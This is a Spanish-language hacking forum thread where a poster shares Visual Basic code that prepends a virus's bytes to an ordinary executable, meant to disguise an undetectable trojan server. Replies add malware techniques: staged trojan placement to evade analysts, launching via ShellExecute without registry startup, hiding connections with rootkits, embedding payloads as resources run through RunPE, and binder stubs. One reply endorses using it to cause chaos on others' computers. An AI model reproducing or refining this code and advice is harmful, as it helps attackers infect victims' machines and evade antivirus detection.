esta función se creo para infectar un exe cualquiera con un virus osea el virus se sobrepone al exe normal y el que se ejecuta es el virus
no es un binder ni nada de eso ya que este agrega directamente los bytes del virus al exe normal el único problema es que no se ejecuta el exe infectado jajaja ese es su bug si alguien sabe como hacer que se ejecuten ambos estaría de fabula! ya que si inyectas un server de un troyano fud qedara disfrazado perfectamente! por favor si lo pueden mejorar dejen su codigo aqui !

Código: Seleccionar todo

Public Function joder(lol As String, exe As String)
 Dim exeho() As Byte
 Dim lolho() As Byte
 Dim flex As Long
 Dim nigga As Long

Open exe For Binary Access Read As #1
 nigga = FileLen(exe)
    ReDim exeho(nigga) As Byte
    Get #1, , exeho
 Close #1
 
 Open lol For Binary Access Read As #2
   flex = FileLen(lol)
      ReDim lolho(flex) As Byte
    Get #2, , lolho
      Close #2
   
   Open exe For Binary Access Write As #3

  Put #3, , lolho
     Put #3, , exeho
 Close #3

End Function
No es un virus :S, un virus es un programa que infecta otros programas, esto lo unico que hace es sobreescribir el ejecutable original en ese caso seria mejor sobreescribir el ejecutable usando FileCopy o otra funcion similar
Imagen

"Me saltó el avira cuando estaba mirando la foto de slandg... ¿como puedo modearlo? " - Skillmax
yo no dije que era un virus si no un inyector el cual ponia los bytes de tu virus en un exe común pero tiene un bug ademas segun yo visual basic no heredo el polimorfismo lo puse par que ayudaran a corregir el bug este codigo va en un modulo

y no entendi lo que dijo sharki si me explicas bro que no te entendi amigo
Dios.. no se si es peor esto.. o el tipo que publicó 'un método' para hacer ejecutables FUDS.. literalmente borrando todo el codigo.. puso un escaner y todo..

Sin comentarios..
slandg escribió:visual basic no heredo el polimorfismo
Entonces por qué el Fly Crypter es Polimorfico?
Y además lo que te dijo SharkI está demsiado claro -.-'
no se no soy muy bueno con las indirectas amigo si me dices que el codigo es una basura dilo y hasta ahi
y no e visto el fly crypter según e leeido visual basic no heredo el poliformismo pero hasta ahi no se
Para infección de ejecutables es preferible un checkeo de registro en el caché para ver si la aplicación fue ejecutada al menos una vez, después con una sentencia If Exist programar para que emplace un fragmento del código del troyano, y otra sentencia que indique que si existe determinado fragmento coloque el resto del troyano (Ideal para cubrirse de las personas que analizan ejecutables )

Ese troyano debería ser carente de inicio de registro (Para no levantar sospechas), así que se iniciaría con un ShellExecute desde la aplicación verdadera. Lo único moderadamente detectable que quedaría sería la conexión saliente (Que con una inyección de código o un rootkit sería invisible)

Voy a ver si hago un manual =P

Un saludo!

Edit: ¿El Fly Crypter es polimórfico? Para mi es sólo un montón de randoms y varias opciones para intercambiar =(
Última edición por KainRazor el 27 Feb 2010, 23:36, editado 1 vez en total.
Imagen
gracias amigo eres el primero que envez de criticar me marca el error y me dice en que falle gracias amigo
no es un binder ni nada de eso ya que este agrega directamente los bytes del virus al exe normal el único problema es que no se ejecuta el exe infectado jajaja ese es su bug si alguien sabe como hacer que se ejecuten ambos estaría de fabula! ya que si inyectas un server de un troyano fud qedara disfrazado perfectamente! por favor si lo pueden mejorar dejen su codigo aqui !
Es por eso que necesita ser un binder, para que ejecute la segunda parte del codigo, para ejecutar la segunda parte necesitarias poner un stub al principio, es decir inyectar el stub en el exe, luego el archivo y luego el virus, y que el stub se encarge de ejecutar ambos, pero eso seria basicamente un binder asi que pues nada nuevo Se agradeze el esfuerzo que te tomaste.
//mHmm..
linkgl escribió:
no es un binder ni nada de eso ya que este agrega directamente los bytes del virus al exe normal el único problema es que no se ejecuta el exe infectado jajaja ese es su bug si alguien sabe como hacer que se ejecuten ambos estaría de fabula! ya que si inyectas un server de un troyano fud qedara disfrazado perfectamente! por favor si lo pueden mejorar dejen su codigo aqui !
Es por eso que necesita ser un binder, para que ejecute la segunda parte del codigo, para ejecutar la segunda parte necesitarias poner un stub al principio, es decir inyectar el stub en el exe, luego el archivo y luego el virus, y que el stub se encarge de ejecutar ambos, pero eso seria basicamente un binder asi que pues nada nuevo Se agradeze el esfuerzo que te tomaste.
gracias amigo habra que hacer otras cosas y mejorar
A ver, no veo quien seas para mandarte indirectas, lo que te tenga que decir, te lo hago de un sólo directazo!!!
No digo que el código sea basura, igual no me importa si lo es ó no lo es, lo que valoro yo son el esfuerzo y las ganas de ayudar.

PD: KainRazor, el Fly es Polimórfico... mira en HackHound y verás, cambia de Stub's.

Salu2
WHITE-R00T escribió:A ver, no veo quien seas para mandarte indirectas, lo que te tenga que decir, te lo hago de un sólo directazo!!!
No digo que el código sea basura, igual no me importa si lo es ó no lo es, lo que valoro yo son el esfuerzo y las ganas de ayudar.

PD: KainRazor, el Fly es Polimórfico... mira en HackHound y verás, cambia de Stub's.

Salu2
no se si es ami que me estas diciendo bro eso no lo dije por ti ok a si que no te enojes amigo
Pero si es lo mas facil del mundo, agregas el virus como recurso y en el form load lo extraes en algun lado y lo ejecutas con shell o shellexecute
Y ya tienes infectado cualquier app. También puede encriptar los datos del recurso o inyectarlos en vez de extraerlos con un RunPE.

Listo!

Saludos
¡Atención! LuisN2.com ha caido, pero el blog sigue estando en www.luisn2indetectables.blogspot.com o www.LuisN2.cz.cc
LuisN2 escribió:Pero si es lo mas facil del mundo, agregas el virus como recurso y en el form load lo extraes en algun lado y lo ejecutas con shell o shellexecute
Y ya tienes infectado cualquier app. También puede encriptar los datos del recurso o inyectarlos en vez de extraerlos con un RunPE.

Listo!

Saludos
Pues es el funcionamiento de un binder, solo que en vez de usar el eof lo inyectas en el res, por eso digo, nada nuevo, saludos
//mHmm..
no hagas caso, a mi me parece util el source, aunk la mayor utilidad k le veo es para causar kaos¡¡¡ en computadora ajena....

Cuidate¡¡¡
Los policias contra los hackers son exactamente igual que la iglesia contra los sabios, ambos castigan la inteligencia....
Responder

Volver a “Otros lenguajes”